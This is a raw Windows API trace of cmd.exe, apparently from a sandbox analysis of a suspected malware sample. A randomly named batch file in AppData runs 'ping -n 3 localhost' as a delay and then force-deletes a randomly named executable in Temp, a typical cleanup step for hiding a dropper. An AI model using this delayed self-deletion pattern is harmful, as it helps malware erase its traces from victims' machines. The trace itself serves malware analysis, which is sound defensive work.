(_String1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\DGaezHhx.cmd", _String2=")") returned 58 [0098.544] _wcsicmp (_String1="FOR", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\DGaezHhx.cmd") returned 3 [0098.544] _wcsicmp (_String1="FOR/?", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\DGaezHhx.cmd") returned 3 [0098.544] _wcsicmp (_String1="IF", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\DGaezHhx.cmd") returned 6 [0098.544] _wcsicmp (_String1="IF/?", 
_String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\DGaezHhx.cmd") returned 6 [0098.544] _wcsicmp (_String1="REM", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\DGaezHhx.cmd") returned 15 [0098.544] _wcsicmp (_String1="REM/?", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\DGaezHhx.cmd") returned 15 [0098.545] GetConsoleTitleW (in: lpConsoleTitle=0x22fa78, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0098.648] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0098.648] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0098.648] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x22f834, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x22f82c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x22f82c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0098.649] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0098.649] SetErrorMode (uMode=0x0) returned 0x0 [0098.649] SetErrorMode (uMode=0x1) returned 0x0 [0098.649] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\.", nBufferLength=0x208, lpBuffer=0x39dc08, lpFilePart=0x22f598 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy", lpFilePart=0x22f598*="vMfCCeRYkvQy") returned 0x2d [0098.649] SetErrorMode (uMode=0x0) returned 0x1 [0098.649] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\.") returned 1 [0098.649] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0098.653] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0098.653] FindFirstFileExW (in: 
lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\DGaezHhx.cmd", fInfoLevelId=0x1, lpFindFileData=0x22f334, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f334) returned 0x3908f0 [0098.653] FindClose (in: hFindFile=0x3908f0 | out: hFindFile=0x3908f0) returned 1 [0098.653] _wcsicmp (_String1=".cmd", _String2=".CMD") returned 0 [0098.653] GetConsoleTitleW (in: lpConsoleTitle=0x22f80c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0098.653] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x769f0000 [0098.656] GetProcAddress (hModule=0x769f0000, lpProcName="SaferIdentifyLevel") returned 0x76a12102 [0098.656] IdentifyCodeAuthzLevelW () returned 0x1 [0098.662] GetProcAddress (hModule=0x769f0000, lpProcName="SaferComputeTokenFromLevel") returned 0x76a13352 [0098.662] ComputeAccessTokenFromCodeAuthzLevel () returned 0x1 [0098.662] GetProcAddress (hModule=0x769f0000, lpProcName="SaferCloseLevel") returned 0x76a13825 [0098.662] CloseCodeAuthzLevel () returned 0x1 [0098.662] SetErrorMode (uMode=0x0) returned 0x0 [0098.662] SetErrorMode (uMode=0x1) returned 0x0 [0098.662] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\DGaezHhx.cmd", nBufferLength=0x104, lpBuffer=0x3904e8, lpFilePart=0x22f6f8 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\DGaezHhx.cmd", lpFilePart=0x22f6f8*="DGaezHhx.cmd") returned 0x3a [0098.662] SetErrorMode (uMode=0x0) returned 0x1 [0098.662] CmdBatNotification () returned 0x0 [0098.662] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\DGaezHhx.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\dgaezhhx.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x22f73c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58 [0098.662] _open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 
3 [0098.662] _get_osfhandle (_FileHandle=3) returned 0x58 [0098.662] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.663] _get_osfhandle (_FileHandle=3) returned 0x58 [0098.663] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.663] ReadFile (in: hFile=0x58, lpBuffer=0x4a116640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x22f720, lpOverlapped=0x0 | out: lpBuffer=0x4a116640*, lpNumberOfBytesRead=0x22f720*=0x91, lpOverlapped=0x0) returned 1 [0098.663] SetFilePointer (in: hFile=0x58, lDistanceToMove=21, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0098.663] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a116640, cbMultiByte=21, lpWideCharStr=0x4a11c640, cchWideChar=8191 | out: lpWideCharStr="ping -n 3 localhost\r\n") returned 21 [0098.663] _get_osfhandle (_FileHandle=3) returned 0x58 [0098.663] GetFileType (hFile=0x58) returned 0x1 [0098.663] _get_osfhandle (_FileHandle=3) returned 0x58 [0098.663] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0098.664] _wcsicmp (_String1="ping", _String2=")") returned 71 [0098.664] _wcsicmp (_String1="FOR", _String2="ping") returned -10 [0098.664] _wcsicmp (_String1="FOR/?", _String2="ping") returned -10 [0098.664] _wcsicmp (_String1="IF", _String2="ping") returned -7 [0098.664] _wcsicmp (_String1="IF/?", _String2="ping") returned -7 [0098.664] _wcsicmp (_String1="REM", _String2="ping") returned 2 [0098.664] _wcsicmp (_String1="REM/?", _String2="ping") returned 2 [0098.665] _tell (_FileHandle=3) returned 21 [0098.665] _close (_FileHandle=3) returned 0 [0098.665] _vsnwprintf (in: _Buffer=0x4a124640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x22f4f4 | out: 
_Buffer="\r\n") returned 2 [0098.665] _get_osfhandle (_FileHandle=1) returned 0x7 [0098.665] GetFileType (hFile=0x7) returned 0x2 [0098.665] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0098.665] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f4b4 | out: lpMode=0x22f4b4) returned 1 [0098.665] _get_osfhandle (_FileHandle=1) returned 0x7 [0098.665] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a124640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x22f4e0, lpReserved=0x0 | out: lpBuffer=0x4a124640*, lpNumberOfCharsWritten=0x22f4e0*=0x2) returned 1 [0098.666] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0098.666] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a115260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0098.666] _vsnwprintf (in: _Buffer=0x4a115e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x22f4f0 | out: _Buffer="C:\\Users\\EEBsYm5\\Desktop") returned 24 [0098.666] _vsnwprintf (in: _Buffer=0x4a115e70, _BufferCount=0x3e6, _Format="%c", _ArgList=0x22f4f0 | out: _Buffer=">") returned 1 [0098.666] _get_osfhandle (_FileHandle=1) returned 0x7 [0098.666] GetFileType (hFile=0x7) returned 0x2 [0098.666] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0098.666] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f4b8 | out: lpMode=0x22f4b8) returned 1 [0098.666] _get_osfhandle (_FileHandle=1) returned 0x7 [0098.666] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a115e40*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x22f4e4, lpReserved=0x0 | out: lpBuffer=0x4a115e40*, lpNumberOfCharsWritten=0x22f4e4*=0x19) returned 1 [0098.666] _get_osfhandle (_FileHandle=1) returned 0x7 [0098.666] GetFileType (hFile=0x7) returned 0x2 [0098.666] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0098.666] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f73c | out: lpMode=0x22f73c) returned 1 [0098.667] _get_osfhandle (_FileHandle=1) returned 0x7 
[0098.667] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x390958*, nNumberOfCharsToWrite=0x4, lpNumberOfCharsWritten=0x22f768, lpReserved=0x0 | out: lpBuffer=0x390958*, lpNumberOfCharsWritten=0x22f768*=0x4) returned 1 [0098.667] _vsnwprintf (in: _Buffer=0x4a124640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x22f774 | out: _Buffer=" -n 3 localhost ") returned 16 [0098.667] _get_osfhandle (_FileHandle=1) returned 0x7 [0098.667] GetFileType (hFile=0x7) returned 0x2 [0098.667] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0098.667] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f734 | out: lpMode=0x22f734) returned 1 [0098.667] _get_osfhandle (_FileHandle=1) returned 0x7 [0098.667] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a124640*, nNumberOfCharsToWrite=0x10, lpNumberOfCharsWritten=0x22f760, lpReserved=0x0 | out: lpBuffer=0x4a124640*, lpNumberOfCharsWritten=0x22f760*=0x10) returned 1 [0098.667] _vsnwprintf (in: _Buffer=0x4a124640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x22f794 | out: _Buffer="\r\n") returned 2 [0098.667] _get_osfhandle (_FileHandle=1) returned 0x7 [0098.667] GetFileType (hFile=0x7) returned 0x2 [0098.667] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0098.667] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f754 | out: lpMode=0x22f754) returned 1 [0098.668] _get_osfhandle (_FileHandle=1) returned 0x7 [0098.668] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a124640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x22f780, lpReserved=0x0 | out: lpBuffer=0x4a124640*, lpNumberOfCharsWritten=0x22f780*=0x2) returned 1 [0098.668] _wcsicmp (_String1="ping", _String2="DIR") returned 12 [0098.668] _wcsicmp (_String1="ping", _String2="ERASE") returned 11 [0098.668] _wcsicmp (_String1="ping", _String2="DEL") returned 12 [0098.668] _wcsicmp (_String1="ping", _String2="TYPE") returned -4 [0098.668] _wcsicmp (_String1="ping", _String2="COPY") returned 13 [0098.668] _wcsicmp (_String1="ping", _String2="CD") returned 13 
[0098.668] _wcsicmp (_String1="ping", _String2="CHDIR") returned 13 [0098.668] _wcsicmp (_String1="ping", _String2="RENAME") returned -2 [0098.668] _wcsicmp (_String1="ping", _String2="REN") returned -2 [0098.668] _wcsicmp (_String1="ping", _String2="ECHO") returned 11 [0098.668] _wcsicmp (_String1="ping", _String2="SET") returned -3 [0098.668] _wcsicmp (_String1="ping", _String2="PAUSE") returned 8 [0098.668] _wcsicmp (_String1="ping", _String2="DATE") returned 12 [0098.668] _wcsicmp (_String1="ping", _String2="TIME") returned -4 [0098.668] _wcsicmp (_String1="ping", _String2="PROMPT") returned -9 [0098.668] _wcsicmp (_String1="ping", _String2="MD") returned 3 [0098.668] _wcsicmp (_String1="ping", _String2="MKDIR") returned 3 [0098.668] _wcsicmp (_String1="ping", _String2="RD") returned -2 [0098.668] _wcsicmp (_String1="ping", _String2="RMDIR") returned -2 [0098.668] _wcsicmp (_String1="ping", _String2="PATH") returned 8 [0098.668] _wcsicmp (_String1="ping", _String2="GOTO") returned 9 [0098.668] _wcsicmp (_String1="ping", _String2="SHIFT") returned -3 [0098.668] _wcsicmp (_String1="ping", _String2="CLS") returned 13 [0098.668] _wcsicmp (_String1="ping", _String2="CALL") returned 13 [0098.668] _wcsicmp (_String1="ping", _String2="VERIFY") returned -6 [0098.668] _wcsicmp (_String1="ping", _String2="VER") returned -6 [0098.668] _wcsicmp (_String1="ping", _String2="VOL") returned -6 [0098.668] _wcsicmp (_String1="ping", _String2="EXIT") returned 11 [0098.668] _wcsicmp (_String1="ping", _String2="SETLOCAL") returned -3 [0098.668] _wcsicmp (_String1="ping", _String2="ENDLOCAL") returned 11 [0098.668] _wcsicmp (_String1="ping", _String2="TITLE") returned -4 [0098.668] _wcsicmp (_String1="ping", _String2="START") returned -3 [0098.668] _wcsicmp (_String1="ping", _String2="DPATH") returned 12 [0098.668] _wcsicmp (_String1="ping", _String2="KEYS") returned 5 [0098.668] _wcsicmp (_String1="ping", _String2="MOVE") returned 3 [0098.668] _wcsicmp (_String1="ping", 
_String2="PUSHD") returned -12 [0098.668] _wcsicmp (_String1="ping", _String2="POPD") returned -6 [0098.668] _wcsicmp (_String1="ping", _String2="ASSOC") returned 15 [0098.668] _wcsicmp (_String1="ping", _String2="FTYPE") returned 10 [0098.669] _wcsicmp (_String1="ping", _String2="BREAK") returned 14 [0098.669] _wcsicmp (_String1="ping", _String2="COLOR") returned 13 [0098.669] _wcsicmp (_String1="ping", _String2="MKLINK") returned 3 [0098.669] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0098.669] SetErrorMode (uMode=0x0) returned 0x0 [0098.669] SetErrorMode (uMode=0x1) returned 0x0 [0098.669] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3a0550, lpFilePart=0x22f538 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x22f538*="Desktop") returned 0x18 [0098.669] SetErrorMode (uMode=0x0) returned 0x1 [0098.669] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0098.669] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0098.669] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0098.669] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0098.670] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0098.670] FindClose (in: hFindFile=0x3a0838 | out: hFindFile=0x3a0838) returned 1 [0098.670] FindClose (in: hFindFile=0x3a0838 | out: hFindFile=0x3a0838) returned 1 [0098.670] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0098.670] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0098.670] GetConsoleTitleW (in: lpConsoleTitle=0x22f304, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0098.670] SetErrorMode (uMode=0x0) returned 0x0 [0098.670] SetErrorMode (uMode=0x1) 
returned 0x0 [0098.670] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3a0a98, lpFilePart=0x22ee24 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x22ee24*="Desktop") returned 0x18 [0098.671] SetErrorMode (uMode=0x0) returned 0x1 [0098.671] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0098.671] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0098.671] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0098.671] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0098.671] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0098.671] FindClose (in: hFindFile=0x3a0d80 | out: hFindFile=0x3a0d80) returned 1 [0098.671] FindClose (in: hFindFile=0x3a0d80 | out: hFindFile=0x3a0d80) returned 1 [0098.671] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0098.671] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0098.671] GetConsoleTitleW (in: lpConsoleTitle=0x22f098, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0098.671] InitializeProcThreadAttributeList (in: lpAttributeList=0x22ef20, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x22efe8 | out: lpAttributeList=0x22ef20, lpSize=0x22efe8) returned 1 [0098.671] UpdateProcThreadAttribute (in: lpAttributeList=0x22ef20, dwFlags=0x0, Attribute=0x60001, lpValue=0x22efe0, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x22ef20, lpPreviousValue=0x0) returned 1 [0098.671] GetStartupInfoW (in: lpStartupInfo=0x22eedc | out: lpStartupInfo=0x22eedc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, 
dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0098.671] lstrcmpW (lpString1="\\PING.EXE", lpString2="\\XCOPY.EXE") returned -1 [0098.672] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\PING.EXE", lpCommandLine="ping -n 3 localhost", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x22ef7c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ping -n 3 localhost", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x22efc8 | out: lpCommandLine="ping -n 3 localhost", lpProcessInformation=0x22efc8*(hProcess=0x54, hThread=0x58, dwProcessId=0xbfc, dwThreadId=0xc00)) returned 1 [0098.759] CloseHandle (hObject=0x58) returned 1 [0098.759] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0098.759] GetEnvironmentStringsW () returned 0x390970* [0098.759] FreeEnvironmentStringsW (penv=0x390970) returned 1 [0098.759] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0102.955] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x22eebc | out: lpExitCode=0x22eebc*=0x0) returned 1 [0102.955] CloseHandle (hObject=0x54) returned 1 [0102.955] _vsnwprintf (in: _Buffer=0x22f004, _BufferCount=0x13, _Format="%08X", _ArgList=0x22eec8 | out: _Buffer="00000000") returned 8 [0102.955] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0102.955] GetEnvironmentStringsW () returned 0x392c28* [0102.955] FreeEnvironmentStringsW (penv=0x392c28) returned 1 [0102.955] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0102.955] GetEnvironmentStringsW () returned 0x392c28* 
[0102.955] FreeEnvironmentStringsW (penv=0x392c28) returned 1 [0102.955] DeleteProcThreadAttributeList (in: lpAttributeList=0x22ef20 | out: lpAttributeList=0x22ef20) [0102.955] _get_osfhandle (_FileHandle=1) returned 0x7 [0102.955] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0102.955] _get_osfhandle (_FileHandle=1) returned 0x7 [0102.955] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1141ac | out: lpMode=0x4a1141ac) returned 1 [0102.955] _get_osfhandle (_FileHandle=0) returned 0x3 [0102.955] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1141b0 | out: lpMode=0x4a1141b0) returned 1 [0102.956] SetConsoleInputExeNameW () returned 0x1 [0102.956] GetConsoleOutputCP () returned 0x1b5 [0102.956] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a114260 | out: lpCPInfo=0x4a114260) returned 1 [0102.956] SetThreadUILanguage (LangId=0x0) returned 0x409 [0102.956] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\DGaezHhx.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\dgaezhhx.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x22f73c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0102.956] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 3 [0102.956] _get_osfhandle (_FileHandle=3) returned 0x54 [0102.956] SetFilePointer (in: hFile=0x54, lDistanceToMove=21, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0102.957] _get_osfhandle (_FileHandle=3) returned 0x54 [0102.957] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0102.957] ReadFile (in: hFile=0x54, lpBuffer=0x4a116640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x22f720, lpOverlapped=0x0 | out: lpBuffer=0x4a116640*, lpNumberOfBytesRead=0x22f720*=0x7c, lpOverlapped=0x0) returned 1 [0102.957] SetFilePointer (in: hFile=0x54, lDistanceToMove=83, 
lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x53 [0102.957] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a116640, cbMultiByte=62, lpWideCharStr=0x4a11c640, cchWideChar=8191 | out: lpWideCharStr="del /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\"\r\n") returned 62 [0102.957] _get_osfhandle (_FileHandle=3) returned 0x54 [0102.957] GetFileType (hFile=0x54) returned 0x1 [0102.957] _get_osfhandle (_FileHandle=3) returned 0x54 [0102.957] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53 [0102.958] _tell (_FileHandle=3) returned 83 [0102.958] _close (_FileHandle=3) returned 0 [0102.959] _vsnwprintf (in: _Buffer=0x4a124640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x22f4f4 | out: _Buffer="\r\n") returned 2 [0102.959] _get_osfhandle (_FileHandle=1) returned 0x7 [0102.959] GetFileType (hFile=0x7) returned 0x2 [0102.959] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0102.959] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f4b4 | out: lpMode=0x22f4b4) returned 1 [0102.959] _get_osfhandle (_FileHandle=1) returned 0x7 [0102.959] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a124640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x22f4e0, lpReserved=0x0 | out: lpBuffer=0x4a124640*, lpNumberOfCharsWritten=0x22f4e0*=0x2) returned 1 [0102.959] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0102.959] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a115260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0102.959] _vsnwprintf (in: _Buffer=0x4a115e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x22f4f0 | out: _Buffer="C:\\Users\\EEBsYm5\\Desktop") returned 24 [0102.960] _vsnwprintf (in: _Buffer=0x4a115e70, _BufferCount=0x3e6, _Format="%c", _ArgList=0x22f4f0 | out: _Buffer=">") returned 1 
[0102.960] _get_osfhandle (_FileHandle=1) returned 0x7 [0102.960] GetFileType (hFile=0x7) returned 0x2 [0102.960] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0102.960] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f4b8 | out: lpMode=0x22f4b8) returned 1 [0102.960] _get_osfhandle (_FileHandle=1) returned 0x7 [0102.960] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a115e40*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x22f4e4, lpReserved=0x0 | out: lpBuffer=0x4a115e40*, lpNumberOfCharsWritten=0x22f4e4*=0x19) returned 1 [0102.960] _get_osfhandle (_FileHandle=1) returned 0x7 [0102.960] GetFileType (hFile=0x7) returned 0x2 [0102.960] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0102.960] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f73c | out: lpMode=0x22f73c) returned 1 [0102.961] _get_osfhandle (_FileHandle=1) returned 0x7 [0102.961] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x39f008*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x22f768, lpReserved=0x0 | out: lpBuffer=0x39f008*, lpNumberOfCharsWritten=0x22f768*=0x3) returned 1 [0102.961] _vsnwprintf (in: _Buffer=0x4a124640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x22f774 | out: _Buffer=" /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\" ") returned 58 [0102.961] _get_osfhandle (_FileHandle=1) returned 0x7 [0102.961] GetFileType (hFile=0x7) returned 0x2 [0102.961] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0102.961] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f734 | out: lpMode=0x22f734) returned 1 [0102.961] _get_osfhandle (_FileHandle=1) returned 0x7 [0102.961] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a124640*, nNumberOfCharsToWrite=0x3a, lpNumberOfCharsWritten=0x22f760, lpReserved=0x0 | out: lpBuffer=0x4a124640*, lpNumberOfCharsWritten=0x22f760*=0x3a) returned 1 [0102.961] _vsnwprintf (in: _Buffer=0x4a124640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x22f794 | out: _Buffer="\r\n") returned 2 [0102.962] _get_osfhandle 
(_FileHandle=1) returned 0x7 [0102.962] GetFileType (hFile=0x7) returned 0x2 [0102.962] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0102.962] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f754 | out: lpMode=0x22f754) returned 1 [0102.962] _get_osfhandle (_FileHandle=1) returned 0x7 [0102.962] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a124640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x22f780, lpReserved=0x0 | out: lpBuffer=0x4a124640*, lpNumberOfCharsWritten=0x22f780*=0x2) returned 1 [0102.962] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0102.962] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0102.962] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0102.962] GetConsoleTitleW (in: lpConsoleTitle=0x22f304, nSize=0x104 | out: 